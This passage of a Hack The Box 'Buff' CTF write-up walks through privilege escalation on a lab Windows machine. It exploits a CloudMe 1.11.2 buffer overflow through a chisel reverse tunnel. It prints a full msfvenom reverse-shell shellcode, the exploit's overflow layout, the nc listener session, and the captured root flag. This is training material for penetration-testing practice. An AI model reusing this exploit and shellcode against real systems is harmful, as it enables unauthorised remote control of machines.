17. searchsploit lists several exploits (shown above). They all run under Python. That leaves two options: either run Python locally on the target, or run Python from my attacker machine (which requires a proxy). Since I don't want to move Python onto the target, moving only chisel across seems far more acceptable.

18. The following command shows where the process executable is located:

wmic process where "name='CloudMe.exe'"

C:\xampp\htdocs\gym\upload>wmic process where "name='CloudMe.exe'"
wmic process where "name='CloudMe.exe'"
Caption CommandLine CreationClassName CreationDate CSCreationClassName CSName Description ExecutablePath ExecutionState Handle HandleCount InstallDate KernelModeTime MaximumWorkingSetSize MinimumWorkingSetSize Name OSCreationClassName OSName OtherOperationCount OtherTransferCount PageFaults PageFileUsage ParentProcessId PeakPageFileUsage PeakVirtualSize PeakWorkingSetSize Priority PrivatePageCount ProcessId QuotaNonPagedPoolUsage QuotaPagedPoolUsage QuotaPeakNonPagedPoolUsage QuotaPeakPagedPoolUsage ReadOperationCount ReadTransferCount SessionId Status TerminationDate ThreadCount UserModeTime VirtualSize WindowsVersion WorkingSetSize WriteOperationCount WriteTransferCount
CloudMe.exe Win32_Process 20240225141200.212184+000 Win32_ComputerSystem BUFF CloudMe.exe 5720 366 2968750 CloudMe.exe Win32_OperatingSystem Microsoft Windows 10 Enterprise|C:\Windows|\Device\Harddisk0\Partition4 988 27400 19081 32016 8712 32244 187199488 38592 6 32784384 5720 26 271 27 273 17 57681 0 15 4062500 184688640 10.0.17134 39485440 22 1988


C:\xampp\htdocs\gym\upload>

19. First, download the exploit code

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m windows/remote/48389.py
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
URL: https://www.exploit-db.com/exploits/48389
Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48389.py

20. Next, copy the port-forwarding tool to the target over SMB

C:\xampp\htdocs\gym\upload>copy \\10.10.14.3\share\chisel_1.9.1_windows_amd64 C:\Users\shaun\Downloads\c.exe
copy \\10.10.14.3\share\chisel_1.9.1_windows_amd64 C:\Users\shaun\Downloads\c.exe
1 file(s) copied.

C:\xampp\htdocs\gym\upload>

21. Now the full exploitation process:

1. Start the chisel server on the attacker machine

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ chmod +x ./chisel_1.9.1_linux_arm64

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./chisel_1.9.1_linux_arm64 server -p 8000 --reverse
2024/02/25 22:27:40 server: Reverse tunnelling enabled
2024/02/25 22:27:40 server: Fingerprint Uaxj5ouL9O3mRQ7uFiIWOBzBzREzabwFHY9Zh5rHTLA=
2024/02/25 22:27:40 server: Listening on http://0.0.0.0:8000

2. Start the chisel client on the target and set up the reverse forward

C:\xampp\htdocs\gym\upload>cd C:\Users\shaun\Downloads\
cd C:\Users\shaun\Downloads\

C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\shaun\Downloads

25/02/2024 14:24 <DIR> .
25/02/2024 14:24 <DIR> ..
25/02/2024 14:14 9,006,080 c.exe
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
13/05/2005 09:53 68,608 nc.exe
3 File(s) 26,905,512 bytes
2 Dir(s) 9,805,324,288 bytes free

C:\Users\shaun\Downloads>.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888
.\c.exe client 10.10.14.3:8000 R:8888:localhost:8888
2024/02/25 14:29:25 client: Connecting to ws://10.10.14.3:8000
2024/02/25 14:29:52 client: Connected (Latency 331.3199ms)


3. The target's port 8888 is now forwarded to the attacker machine

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ ./chisel_1.9.1_linux_arm64 server -p 8000 --reverse
2024/02/25 22:27:40 server: Reverse tunnelling enabled
2024/02/25 22:27:40 server: Fingerprint Uaxj5ouL9O3mRQ7uFiIWOBzBzREzabwFHY9Zh5rHTLA=
2024/02/25 22:27:40 server: Listening on http://0.0.0.0:8000
2024/02/25 22:29:52 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening


┌──(kali㉿offsec)-[~/Desktop]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 54039/python3
tcp 0 0 127.0.0.1:57727 0.0.0.0:* LISTEN 54039/python3
tcp 0 0 127.0.0.1:54191 0.0.0.0:* LISTEN 54039/python3
tcp6 0 0 :::8888 :::* LISTEN 58039/./chisel_1.9.
tcp6 0 0 :::8000 :::* LISTEN 58039/./chisel_1.9.

┌──(kali㉿offsec)-[~/Desktop]
└─$


4. Modify the existing PoC code to suit our needs

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"



Generate our own payload with msfvenom

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1899 bytes
payload = b""
payload += b"\xbb\x4d\x94\x1f\xda\xd9\xc9\xd9\x74\x24\xf4"
payload += b"\x5a\x2b\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12"
payload += b"\x83\x8f\x90\xfd\x2f\xf3\x71\x83\xd0\x0b\x82"
payload += b"\xe4\x59\xee\xb3\x24\x3d\x7b\xe3\x94\x35\x29"
payload += b"\x08\x5e\x1b\xd9\x9b\x12\xb4\xee\x2c\x98\xe2"
payload += b"\xc1\xad\xb1\xd7\x40\x2e\xc8\x0b\xa2\x0f\x03"
payload += b"\x5e\xa3\x48\x7e\x93\xf1\x01\xf4\x06\xe5\x26"
payload += b"\x40\x9b\x8e\x75\x44\x9b\x73\xcd\x67\x8a\x22"
payload += b"\x45\x3e\x0c\xc5\x8a\x4a\x05\xdd\xcf\x77\xdf"
payload += b"\x56\x3b\x03\xde\xbe\x75\xec\x4d\xff\xb9\x1f"
payload += b"\x8f\x38\x7d\xc0\xfa\x30\x7d\x7d\xfd\x87\xff"
payload += b"\x59\x88\x13\xa7\x2a\x2a\xff\x59\xfe\xad\x74"
payload += b"\x55\x4b\xb9\xd2\x7a\x4a\x6e\x69\x86\xc7\x91"
payload += b"\xbd\x0e\x93\xb5\x19\x4a\x47\xd7\x38\x36\x26"
payload += b"\xe8\x5a\x99\x97\x4c\x11\x34\xc3\xfc\x78\x51"
payload += b"\x20\xcd\x82\xa1\x2e\x46\xf1\x93\xf1\xfc\x9d"
payload += b"\x9f\x7a\xdb\x5a\xdf\x50\x9b\xf4\x1e\x5b\xdc"
payload += b"\xdd\xe4\x0f\x8c\x75\xcc\x2f\x47\x85\xf1\xe5"
payload += b"\xc8\xd5\x5d\x56\xa9\x85\x1d\x06\x41\xcf\x91"
payload += b"\x79\x71\xf0\x7b\x12\x18\x0b\xec\x17\xd7\x1d"
payload += b"\xef\x4f\xe5\x21\xfe\xd3\x60\xc7\x6a\xfc\x24"
payload += b"\x50\x03\x65\x6d\x2a\xb2\x6a\xbb\x57\xf4\xe1"
payload += b"\x48\xa8\xbb\x01\x24\xba\x2c\xe2\x73\xe0\xfb"
payload += b"\xfd\xa9\x8c\x60\x6f\x36\x4c\xee\x8c\xe1\x1b"
payload += b"\xa7\x63\xf8\xc9\x55\xdd\x52\xef\xa7\xbb\x9d"
payload += b"\xab\x73\x78\x23\x32\xf1\xc4\x07\x24\xcf\xc5"
payload += b"\x03\x10\x9f\x93\xdd\xce\x59\x4a\xac\xb8\x33"
payload += b"\x21\x66\x2c\xc5\x09\xb9\x2a\xca\x47\x4f\xd2"
payload += b"\x7b\x3e\x16\xed\xb4\xd6\x9e\x96\xa8\x46\x60"
payload += b"\x4d\x69\x76\x2b\xcf\xd8\x1f\xf2\x9a\x58\x42"
payload += b"\x05\x71\x9e\x7b\x86\x73\x5f\x78\x96\xf6\x5a"
payload += b"\xc4\x10\xeb\x16\x55\xf5\x0b\x84\x56\xdc"


Then replace the payload in the script with the output above


5. Start a local listener on port 4444 and run the exploit script


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48389.py

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 48389.py


6. Shell obtained; read the flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.198] 49701
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

22. Finally, get the last flag

C:\Windows\system32>cd C:\Users
cd C:\Users

C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users

16/06/2020 19:52 <DIR> .
16/06/2020 19:52 <DIR> ..
20/07/2020 11:08 <DIR> Administrator
16/06/2020 14:08 <DIR> Public
16/06/2020 14:11 <DIR> shaun
0 File(s) 0 bytes
5 Dir(s) 9,804,349,440 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\Administrator

20/07/2020 11:08 <DIR> .
20/07/2020 11:08 <DIR> ..
18/07/2020 16:36 <DIR> 3D Objects
16/06/2020 15:48 <DIR> CloudMe
18/07/2020 16:36 <DIR> Contacts
18/07/2020 16:36 <DIR> Desktop
18/07/2020 16:36 <DIR> Documents
18/07/2020 16:36 <DIR> Downloads
18/07/2020 16:36 <DIR> Favorites
18/07/2020 16:36 <DIR> Links
18/07/2020 16:36 <DIR> Music
16/06/2020 15:44 <DIR> OneDrive
18/07/2020 16:36 <DIR> Pictures
18/07/2020 16:36 <DIR> Saved Games
18/07/2020 16:36 <DIR> Searches
18/07/2020 16:36 <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 9,804,673,024 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7

Directory of C:\Users\Administrator\Desktop

18/07/2020 16:36 <DIR> .
18/07/2020 16:36 <DIR> ..
16/06/2020 15:41 1,417 Microsoft Edge.lnk
25/02/2024 09:48 34 root.txt
2 File(s) 1,451 bytes
2 Dir(s) 9,804,673,024 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
953f07358bd747447440c411929cdd21

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/263


Buff-htb-writeup
https://sh1yan.top/2024/02/23/Buff-htb-writeup/
Author: shiyan
Published: February 23, 2024